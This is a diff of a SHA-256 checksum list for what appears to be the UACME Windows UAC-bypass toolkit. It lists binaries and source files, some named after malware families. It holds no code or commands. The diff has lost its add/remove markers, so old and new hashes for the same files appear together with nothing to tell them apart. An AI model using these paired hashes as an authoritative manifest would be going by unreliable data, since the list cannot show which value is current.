8e9687f9d47757e9c97f17d2e4f05cdd5810ff696290261da8ce9dd1ae505e4f *Compiled\Akagi64.exe
bc7b0c12581633eae06b6f5c4ac6d97a8ad061383e6909f43037856a497b3138 *Compiled\UacInfo64.exe
c3aadb6fb35a7bcf5855706b10e993f068828417ab7d3e12da90f0ad7b70f1f2 *Compiled\Akagi32.exe
38149f3b29758b855354bab50beb4e910cce9f2b5cfa393e940e4618eaf1cb76 *Compiled\Akagi64.exe
b6566783e023d055c31830ce754ea806cc3e4da856dc016264db16013cd8929d *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
9a7fcbc8cbd7b8a875f828e45f1813847c9daa52bbe63864154f71ed53a056fb *Source\uacme.sln
39cd224f1349523f193b0bd95ccae5d6ee31dbd625aae5b4ab91cca2bdeb69c7 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
270efb0d86f638f7978ceeeacdcd8addc793933b8915c193623c4e9efedfb05d *Source\Akagi\apphelp.h
@ -13,78 +13,81 @@ b5158a54a382d5d219af835d6664525b54bc30bbb4999ed73741a4731e8db040 *Source\Akagi\b
65ca05df060b36704e38db08c0c56a358c4c73145a690f0713bb1c5560fc0a98 *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
3163a5938ab4f15082f0960e30f39d29bd5a120e692134db8a7da2ea6c6b1978 *Source\Akagi\comet.c
ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
f08a3e73e61836aa5a77441f75f6c0798512b5e949f84aa2caef0646c70005b4 *Source\Akagi\compress.c
888f884ca226ac9c1f615496f70fd4e9e03976f40de3a4026b4f9cdbc92347d9 *Source\Akagi\comet.h
b8e8bcfcec9529c1aa34bb1d1b19e66f7ef157962e65eb390c54705accc78126 *Source\Akagi\compress.c
be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
27c861254f565093f5b30d03640121bb3bd4a8d0e7b4b627dc33eee0e8dc8f2e *Source\Akagi\consts.h
b91747dbb9928504618194423d1d2d0a32f7fd2c4d0233778bc48c121ba98ba2 *Source\Akagi\enigma0x3.c
6081ff03b89f37e46e378ce0258336ad5451fc821c4fc7da5ddfa5c92b5db0cd *Source\Akagi\enigma0x3.c
362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
682b685196d19eaaecdd73f371515cea13ef67ae34dd1f6ecb3d711e29e0e42f *Source\Akagi\explife.c
425bd2ffc4dcd71ed5dac01f31236cdc80ab5ca5c77e211b3c58c48adead3da6 *Source\Akagi\explife.c
f4315ba7926b6a73a497b1dad53bb47509f43fb20009cee051ca065f41cb3417 *Source\Akagi\explife.h
a06795ff3509f2d02a6e3ca3e675d306e7c9669e6b87e6e1d2f14d6f149245e3 *Source\Akagi\global.h
ed2d2dd8f192251a608bb98d51f09bc2f792494c79330d6d9184e1806e3513bc *Source\Akagi\global.h
5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
f166daea90a02bd9ba0fbbfae26c668a470f680a5ed752bdd4052fb82ef78b7c *Source\Akagi\hybrids.c
49458af00933874313d878e3c223473c10eff60a3e79d209967eee8a78d9a344 *Source\Akagi\hybrids.c
81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
220dd784ef9475bbeb21f7ecb9c54acfd571f8c420dc7e0c6dd632694261ab3b *Source\Akagi\main.c
78598dd659978dd673739cefac448aeb5bb6799692c5f23ba36300115f9d43ae *Source\Akagi\main.c
dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
795a325be6a31be7d91d09c230a00b2503ad061080fb494ae49c532a283d7bb8 *Source\Akagi\pitou.c
1f4be768fd390a3c8f80a326f10bf626c01da4e70cf89c46139dc64c8425647f *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
e81122b88e1574515722554f2edddde13db239fc21617fe7a78a8827d6ea07fb *Source\Akagi\Resource.rc
4da1fb2643bae679d681ef3ea94539a58177098ea36ba7cf7227ff48cff5ad2f *Source\Akagi\Resource.rc
d76f935faa2318354b976f83a30223e4fadcf8ae3df720577aafa5b2d5a7deaa *Source\Akagi\simda.c
450593a7d138e57b10200ecaeb1ac75ef0c8dd348f64b3a2e9e960740ca4a0fd *Source\Akagi\simda.h
41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
8ba2fdaba2d39c321b8d17974bafbb56554d7e049e4494c5a9bcd59765916d17 *Source\Akagi\sirefef.h
084bbb45cfae0af57bbef71b351a28c03e20ce7666c3e3e38d3ed3597bdccb1a *Source\Akagi\sup.c
b190b33893283d13de945bd0c63fd1f3e0f5df3c8f74e50daa29c3bbf57cac9b *Source\Akagi\sup.h
ed49c508485eb1a372ddcd131aa688c969fa536f3845055e51b5611c2a792d49 *Source\Akagi\uacme.vcxproj
fdb9f869c33fd8208c837548d3a827e20312249455c19f8cd34a01fd20e2cccd *Source\Akagi\uacme.vcxproj.filters
eb362511262bd72ee14392aac1fd7c64f4be77d96b47797ac69dbadc873acc50 *Source\Akagi\uacme.vcxproj.user
087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
65ccadb5660c32cd9bfb6d27673b8ccea966ce383881b0fa71b260922c773fc6 *Source\Akagi\bin\Hibiki64.cd
b062e2be5a17984dce931536ba80785bd95d8dc9a1bfc21c0b22315712f4bca7 *Source\Akagi\bin\Ikazuchi32.cd
c650a5448056d708d21799617246ee47f9569afa5415e78f9be07d85055ead46 *Source\Akagi\bin\Ikazuchi64.cd
8b47a94d19a8c883e95174faa880839c814501326db310c6c166697b0124314c *Source\Akagi\uacme.vcxproj
05f28a23f92ed4dee4490ed547d06d49e90d521037711ec4d63382d83d868b4c *Source\Akagi\uacme.vcxproj.filters
3b33eaab5cf41c023af5b51bf6348ecb6b6181b81b82d1ae4a577f84c7cc2069 *Source\Akagi\uacme.vcxproj.user
d47ce8e2e94e6837f60ffe384e50d72c896e3325a49d45021787b3754f9eb6c7 *Source\Akagi\bin\Fubuki32.cd
cf617d6472d2f81d11cfdf654c8ccccc3ef2d14bc5854e0deefdb53f72cefb47 *Source\Akagi\bin\Fubuki64.cd
94ebfac14f977d4bd8a0e655eac290c49b20285d8fff32e33d668cce51580a1f *Source\Akagi\bin\Hibiki32.cd
ec5e1b33a24f3278b1bc070333ed495909d7ded3d49156c97dda72131c01cbe0 *Source\Akagi\bin\Hibiki64.cd
c61f3a9a959eb6bd2eaec276eff854d07f6f183d46588da5e68c0e8a009f5d1d *Source\Akagi\bin\Ikazuchi32.cd
37cee2abfa1f8e3713e4b7282d8888c1d91fcbf517edd4c5d452942ab2c7057e *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
28cc1e0994cc8fb7d87cc13d7bbc800480ddd1f5242f5050ff06e8d9d9767048 *Source\Fubuki\dll.vcxproj
f49b43684d8b4bb77cbfc3a304951241d868259ece59af019fc375748dab72dd *Source\Akagi\tests\test.c
dab6e990a8872a3c25f95e7ce2a8ad2da1f99167b563662bdad44e4e20b7c769 *Source\Akagi\tests\test.h
e1a1592759e7f8f1f50e3f5b1ad55067ec30bcd44072f84a163f91956b72710d *Source\Fubuki\dll.vcxproj
d26d437c4410b29f2b428fde9f7a029b5c94429b7aa99f430b629479783e623f *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
57aa4133d0328d2a44825ff4d8804f52518fdea6e83d9cca7b60c3777324be85 *Source\Fubuki\dllmain.c
a4cf42b8c2ea71d8efa61e55b54a736c256d1cdd99f5774a15beec8b85327d68 *Source\Fubuki\dllmain.c
c424f02f0764802d4097e5bc8217f6cb777da82e1bc15f6c4d5e7a00174c2483 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
b356eba53196c805864e2ac2fd5a4b38984a377698320c34dc70484de61f2adb *Source\Fubuki\version.rc
0109acffa378156d44353a55d398f4f48bb51e4c59e268c8f3ffba6553f307ef *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
7b5106df39693d85f43060cdc45b9405c7db3b9995f1fc8482bf602d33843dbf *Source\Hibiki\dllmain.c
769a7bccff14fec330c1d36704fc0c4060c2700a3f53f4a6148cbe90bb796ca5 *Source\Hibiki\Hibiki.vcxproj
47aed58ea27d928443197579dfa0c52718a3f6784464c9b1e7cd965d790e112b *Source\Hibiki\dllmain.c
691f137f1ce6a476d1bc9d8cdc1c6b3ad977d888824ce1b9bed356e94ea4d8fb *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
2445782239ea27dce10bca969eff59bb279b963b05c95e5b47d8634f86c0da03 *Source\Hibiki\version.rc
3e987580133daa652cfb7639c83d852b004400a8beff5f6abf6ec0d0b824c29c *Source\Ikazuchi\dllmain.c
4dfa74d554b7be0eb26c1d08232401bd33ffca0e5a619bcd209d4839425f7b3e *Source\Hibiki\version.rc
e04bfbf94d1d78162e3960022f0b3583433354ef3a56d7b2786da35178af7c0a *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
71808e6ef3af9c0fa3173d1c01aad2f4c2ed20024e6bd068631796949966f1fc *Source\Ikazuchi\Ikazuchi.vcxproj
b34657273d28a94323579208865216135b219ec9d63a4ae15047a3fd529e7b95 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
0b180f5168abbb6fa6754931ab3de21f0fdc964615a591a4154040a745a328b8 *Source\Ikazuchi\version.rc
851c5fb0f9333d779542def40e124021fd84e1ab56075a5a0da64b33abe5f892 *Source\Inazuma\Inazuma.vcxproj
c3191014030e36944c1e43d73369df8093cead1b1bf730975dc43abe9fb5ad87 *Source\Ikazuchi\version.rc
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
602a920e9d044190055552068bf5e6cc97589988bf7294882e77b2b84fb0e380 *Source\Inazuma\main.c
fc35222348ffb1c055cb1e8153d15d6c11667f5073ad2f9a821ee090ab8294b1 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
9d5b86807c7ad8b954b4bc9ade511e57ccfc71854d228f48fb4bfd6ae9f2235f *Source\Naka\main.c
4463b699dbad298e546848003f78308dc056267c6628f72485571f08da08826e *Source\Naka\Naka.vcxproj
3aa5f39feacabfdbf5c82fcbf523514804cc15d1bcf54f1fc9464d53014efd05 *Source\Naka\main.c
5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
db0e164fc1f567f1759603df36a0e44ebb728281fd1aa95977c3d575db58c34c *Source\Shared\ntos.h
009c1782cdeb0bffa9fd98ea42d74e3f5a050ea159f4c78d8252eb86d60febf2 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c
@ -103,13 +106,13 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Shared\_strncmpi.c
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\_strncpy.c
52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6 *Source\Shared\_strstri.c
f757bdc4baf67493591a14d11aef2adaa32690376fc34b698627aec63b156539 *Source\Yuubari\appinfo.c
24432117a04e33dfb64e6defc8fcfc7f1298dde6bde8231d667bd9c9879e5755 *Source\Yuubari\appinfo.c
241814ee27790e05e3e3e3b0555720933175d3202855a9f2efff42b90496a1a1 *Source\Yuubari\appinfo.h
ffd6ad03b61ebb541f76c9ba105a916671f89c8220bf145b4d154943c94e85a9 *Source\Yuubari\basic.c
6cc92c6f21f4a9ad09c05f562404b195b8a7130bf512f39c4a6af6a46b97d6e0 *Source\Yuubari\basic.h
048c8865e9c699c0dbd328983fddefefba5c3bb9f1c0a146d7e4e42aa7dac2a1 *Source\Yuubari\comobj.c
9386b37510b8ea6c681d16b8a308d4e1fb0a030ed174cdd0899683a2e88d44ed *Source\Yuubari\comobj.h
1fb49d3f7ab0acecdc247bf0d9154a5ec37b539d4db0ed4d6a620af6f5220ad1 *Source\Yuubari\consts.h
9ddb6961b858c7841c00da8924f3daa705032305873c5ff24bdeab8f7a5be4df *Source\Yuubari\consts.h
a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari\cui.c
2d2891290f7780933347dcbd091bf0a17af6ee52257b5497951ff80567e03f88 *Source\Yuubari\cui.h
6916b415010caa7e0801ea515a722dbff8a3329ffa716977914f5b81a337d0c3 *Source\Yuubari\fusion.c
@ -117,16 +120,16 @@ a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari
d8300b2b51d4f179dd2eaa453dafef6da331889a6bff97c281303cc980fc6a67 *Source\Yuubari\global.h
04bd5497fa817f15e3f6d63325c5e20172fde7f4c668d1dfdc35f99b228d3f33 *Source\Yuubari\logger.c
9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4 *Source\Yuubari\logger.h
5bd341aff5d0c75429580da5c2f9ec28753e82e3770d5028e243922784738a62 *Source\Yuubari\main.c
ac3026bf74108f833d3059411f4d21f1146f686329fd2c141cb4883cc1909ae7 *Source\Yuubari\patterns.h
1fe4b833867d06e3b0d156f0990aa6e83938bcf62da460747286b06e069498a3 *Source\Yuubari\main.c
321c200b9b4452270e4b66b23d004e421e2767949622ae9a9b3953c402b870e1 *Source\Yuubari\patterns.h
76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022 *Source\Yuubari\resource.h
0e6bff106ee03caa9b94dca4542432e6c9d47d22e7f47ebf30a38b2c5bbc1b51 *Source\Yuubari\Resource.rc
c598f46133f3f8d458b2b45ae9a4f77696403fcd0e4f1a740df161ca824943d5 *Source\Yuubari\Resource.rc
c90af8a79275833683c07bc639005a168ac194ea9203ad5c76c211008a1e8591 *Source\Yuubari\sup.c
80b0d3d17b61d83dd8dda02ce006acfa644d6ec51439454fb8a9485a353a07e5 *Source\Yuubari\sup.h
ab68c022e2fc5a8a3f6d5c1dcff00825ac9c533160983d33e93931573c02d85d *Source\Yuubari\wintrustex.h
d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e *Source\Yuubari\yuubari.ico
1f39aa99875efc5db0e4e041657d3c6a9a9bb5de320c53f3a777cfcb29f4c643 *Source\Yuubari\Yuubari.vcxproj
23b7bff5645fe2c5e928ba1807c561449148c16423d5b4c1d87caa20383f9504 *Source\Yuubari\Yuubari.vcxproj
a23fb5dccb937ee5103c59c6775f3017b97396d43f1399d1a2ada3ce9c8fd82f *Source\Yuubari\Yuubari.vcxproj.filters
86b904f9099ce583f13128e998a7d9f1f48682354b12c778a23615c361c44425 *Source\Yuubari\Yuubari.vcxproj.user
3cf272ba16777722e4c9920655ee501ccfafa84538af835e6c3a3f972aa70a7c *Source\Yuubari\tests\test_fusion.c
7b670598687782b8ef5ff7a95b54118dc5a4743a88c28100878e9855d6a2c250 *Source\Yuubari\tests\test_fusion.c
8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f *Source\Yuubari\tests\test_fusion.h